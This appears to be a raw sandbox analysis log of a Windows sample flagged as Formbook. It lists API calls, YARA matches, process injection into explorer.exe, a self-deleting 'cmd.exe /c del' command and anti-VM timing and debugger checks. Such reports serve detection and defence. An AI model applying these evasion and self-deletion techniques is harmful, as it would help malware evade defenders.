          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016799D0 NtCreateProcessEx,6_2_016799D0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0167B040 NtSuspendThread,6_2_0167B040
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679820 NtEnumerateKey,6_2_01679820
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016798A0 NtWriteVirtualMemory,6_2_016798A0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679B00 NtSetValueKey,6_2_01679B00
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0167A3B0 NtGetContextThread,6_2_0167A3B0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679A10 NtQuerySection,6_2_01679A10
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679A80 NtOpenDirectoryObject,6_2_01679A80
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679560 NtWriteFile,6_2_01679560
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679520 NtWaitForSingleObject,6_2_01679520
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0167AD30 NtSetContextThread,6_2_0167AD30
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016795F0 NtQueryInformationFile,6_2_016795F0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679760 NtOpenProcess,6_2_01679760
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0167A770 NtOpenThread,6_2_0167A770
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679770 NtSetInformationFile,6_2_01679770
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679730 NtQueryVirtualMemory,6_2_01679730
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0167A710 NtOpenProcessToken,6_2_0167A710
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679670 NtQueryInformationProcess,6_2_01679670
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679650 NtQueryValueKey,6_2_01679650
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679610 NtEnumerateValueKey,6_2_01679610
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016796D0 NtCreateKey,6_2_016796D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_05079910
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079540 NtReadFile,LdrInitializeThunk,11_2_05079540
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050799A0 NtCreateSection,LdrInitializeThunk,11_2_050799A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050795D0 NtClose,LdrInitializeThunk,11_2_050795D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079840 NtDelayExecution,LdrInitializeThunk,11_2_05079840
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079860 NtQuerySystemInformation,LdrInitializeThunk,11_2_05079860
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079710 NtQueryInformationToken,LdrInitializeThunk,11_2_05079710
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079780 NtMapViewOfSection,LdrInitializeThunk,11_2_05079780
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079FE0 NtCreateMutant,LdrInitializeThunk,11_2_05079FE0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079A50 NtCreateFile,LdrInitializeThunk,11_2_05079A50
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079650 NtQueryValueKey,LdrInitializeThunk,11_2_05079650
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_05079660
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050796D0 NtCreateKey,LdrInitializeThunk,11_2_050796D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050796E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_050796E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079520 NtWaitForSingleObject,11_2_05079520
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0507AD30 NtSetContextThread,11_2_0507AD30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079950 NtQueueApcThread,11_2_05079950
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079560 NtWriteFile,11_2_05079560
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050799D0 NtCreateProcessEx,11_2_050799D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050795F0 NtQueryInformationFile,11_2_050795F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079820 NtEnumerateKey,11_2_05079820
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0507B040 NtSuspendThread,11_2_0507B040
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050798A0 NtWriteVirtualMemory,11_2_050798A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050798F0 NtReadVirtualMemory,11_2_050798F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079B00 NtSetValueKey,11_2_05079B00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0507A710 NtOpenProcessToken,11_2_0507A710
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079730 NtQueryVirtualMemory,11_2_05079730
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079760 NtOpenProcess,11_2_05079760
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079770 NtSetInformationFile,11_2_05079770
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0507A770 NtOpenThread,11_2_0507A770
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050797A0 NtUnmapViewOfSection,11_2_050797A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0507A3B0 NtGetContextThread,11_2_0507A3B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079A00 NtProtectVirtualMemory,11_2_05079A00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079610 NtEnumerateValueKey,11_2_05079610
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079A10 NtQuerySection,11_2_05079A10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079A20 NtResumeThread,11_2_05079A20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079670 NtQueryInformationProcess,11_2_05079670
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079A80 NtOpenDirectoryObject,11_2_05079A80
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_009881B0 NtCreateFile,11_2_009881B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_009882E0 NtClose,11_2_009882E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00988260 NtReadFile,11_2_00988260
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00988390 NtAllocateVirtualMemory,11_2_00988390
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_009881AC NtCreateFile,11_2_009881AC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_009882DA NtClose,11_2_009882DA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00988262 NtReadFile,11_2_00988262
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0503B150 appears 35 times
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: String function: 0163B150 appears 35 times
          Source: 0O9BJfVJi6fEMoS.exeBinary or memory string: OriginalFilename vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.686761788.00000000006E2000.00000002.00020000.sdmpBinary or memory string: OriginalFilename5uogbG vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.695770371.0000000008A00000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exeBinary or memory string: OriginalFilename vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exe, 00000005.00000000.684507893.0000000000312000.00000002.00020000.sdmpBinary or memory string: OriginalFilename5uogbG vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exeBinary or memory string: OriginalFilename vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.730975183.0000000000AA2000.00000002.00020000.sdmpBinary or memory string: OriginalFilename5uogbG vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.732802577.000000000172F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exe, 00000006.00000003.730245049.00000000039AE000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXEj% vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exeBinary or memory string: OriginalFilename5uogbG vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.696031440.0000000008C80000.00000004.00000001.sdmp, Binary or memory string: ^.vBpq
          Source: classification engine, Classification label: mal100.troj.evad.winEXE@10/1@12/9
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\0O9BJfVJi6fEMoS.exe.log
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Mutant created: \Sessions\1\BaseNamedObjects\TwFbGi
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6824:120:WilError_01
          Source: unknown, Process created: C:\Windows\SysWOW64\explorer.exe
          Source: 0O9BJfVJi6fEMoS.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe, File read: C:\Windows\System32\drivers\etc\hosts
          Source: 0O9BJfVJi6fEMoS.exe, ReversingLabs: Detection: 21%
          Source: unknown, Process created: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe 'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe'
          Source: unknown, Process created: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe {path}
          Source: unknown, Process created: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe {path}
          Source: unknown, Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: unknown, Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: unknown, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe'
          Source: unknown, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Process created: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe {path}
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Process created: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe {path}
          Source: C:\Windows\SysWOW64\explorer.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe'
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: 0O9BJfVJi6fEMoS.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 0O9BJfVJi6fEMoS.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: explorer.pdbUGP source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.733414389.00000000032E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.705470471.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, explorer.exe, 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 0O9BJfVJi6fEMoS.exe, explorer.exe
          Source: Binary string: explorer.pdb source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.733414389.00000000032E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.705470471.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Code function: 0_2_051E1598 push eax; mov dword ptr [esp], ecx 0_2_051E159C
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Code function: 6_2_0040BAA8 push ebp; iretd 6_2_0040BAAA
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Code function: 6_2_0041B3F2 push eax; ret 6_2_0041B3F8
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Code function: 6_2_0041B3FB push eax; ret 6_2_0041B462
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Code function: 6_2_0041C399 push edi; ret 6_2_0041C39B
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Code function: 6_2_0041B3A5 push eax; ret 6_2_0041B3F8
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Code function: 6_2_0041B45C push eax; ret 6_2_0041B462
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Code function: 6_2_00415554 push cs; iretd 6_2_00415555
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Code function: 6_2_0041CE23 push esp; ret 6_2_0041CF5C
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Code function: 6_2_00413755 push eax; retf 6_2_00413757
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Code function: 6_2_0168D0D1 push ecx; ret 6_2_0168D0E4
          Source: C:\Windows\SysWOW64\explorer.exe, Code function: 11_2_0508D0D1 push ecx; ret 11_2_0508D0E4
          Source: C:\Windows\SysWOW64\explorer.exe, Code function: 11_2_0097BAA8 push ebp; iretd 11_2_0097BAAA
          Source: C:\Windows\SysWOW64\explorer.exe, Code function: 11_2_0098C399 push edi; ret 11_2_0098C39B
          Source: C:\Windows\SysWOW64\explorer.exe, Code function: 11_2_0098B3A5 push eax; ret 11_2_0098B3F8
          Source: C:\Windows\SysWOW64\explorer.exe, Code function: 11_2_0098B3FB push eax; ret 11_2_0098B462
          Source: C:\Windows\SysWOW64\explorer.exe, Code function: 11_2_0098B3F2 push eax; ret 11_2_0098B3F8
          Source: C:\Windows\SysWOW64\explorer.exe, Code function: 11_2_0098B45C push eax; ret 11_2_0098B462
          Source: C:\Windows\SysWOW64\explorer.exe, Code function: 11_2_00985554 push cs; iretd 11_2_00985555
          Source: C:\Windows\SysWOW64\explorer.exe, Code function: 11_2_0098CE23 push esp; ret 11_2_0098CF5C
          Source: C:\Windows\SysWOW64\explorer.exe, Code function: 11_2_00983755 push eax; retf 11_2_00983757
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exe, RDTSC instruction interceptor: First address: 00000000009785E4 second address: 00000000009785EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exe, RDTSC instruction interceptor: First address: 000000000097896E second address: 0000000000978974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Code function: 6_2_004088A0 rdtsc 6_2_004088A0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe TID: 7056, Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5856, Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 6188, Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\explorer.exe, Last function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exe, Last function: Thread delayed
          Source: explorer.exe, 00000007.00000002.923576890.00000000058C0000.00000002.00000001.sdmp, Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000007.00000000.710461036.000000000A60E000.00000004.00000001.sdmp, Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.705821818.0000000006650000.00000004.00000001.sdmp, Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.717818953.000000000FC96000.00000004.00000001.sdmp, Binary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000007.00000002.920387906.0000000004710000.00000004.00000001.sdmp, Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000007.00000002.923576890.00000000058C0000.00000002.00000001.sdmp, Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000007.00000000.711037304.000000000A716000.00000004.00000001.sdmp, Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000007.00000002.923576890.00000000058C0000.00000002.00000001.sdmp, Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000007.00000000.711186736.000000000A784000.00000004.00000001.sdmp, Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000007.00000002.923576890.00000000058C0000.00000002.00000001.sdmp, Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Process queried: DebugPort
          Source: C:\Windows\SysWOW64\explorer.exe, Process queried: DebugPort
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Code function: 6_2_004088A0 rdtsc 6_2_004088A0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Code function: 6_2_00409B10 LdrLoadDll, 6_2_00409B10
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe, Code function: 6_2_0163C962 mov eax, dword ptr fs:[00000030h] 6_2_0163C962
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]6_2_01643D34
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]6_2_01643D34
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]6_2_01643D34
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]6_2_01643D34
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01643D34 mov eax, dword ptr fs:[00000030h]6_2_01643D34
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163AD30 mov eax, dword ptr fs:[00000030h]6_2_0163AD30
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FE539 mov eax, dword ptr fs:[00000030h]6_2_016FE539
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016BA537 mov eax, dword ptr fs:[00000030h]6_2_016BA537
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01664D3B mov eax, dword ptr fs:[00000030h]6_2_01664D3B
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01664D3B mov eax, dword ptr fs:[00000030h]6_2_01664D3B
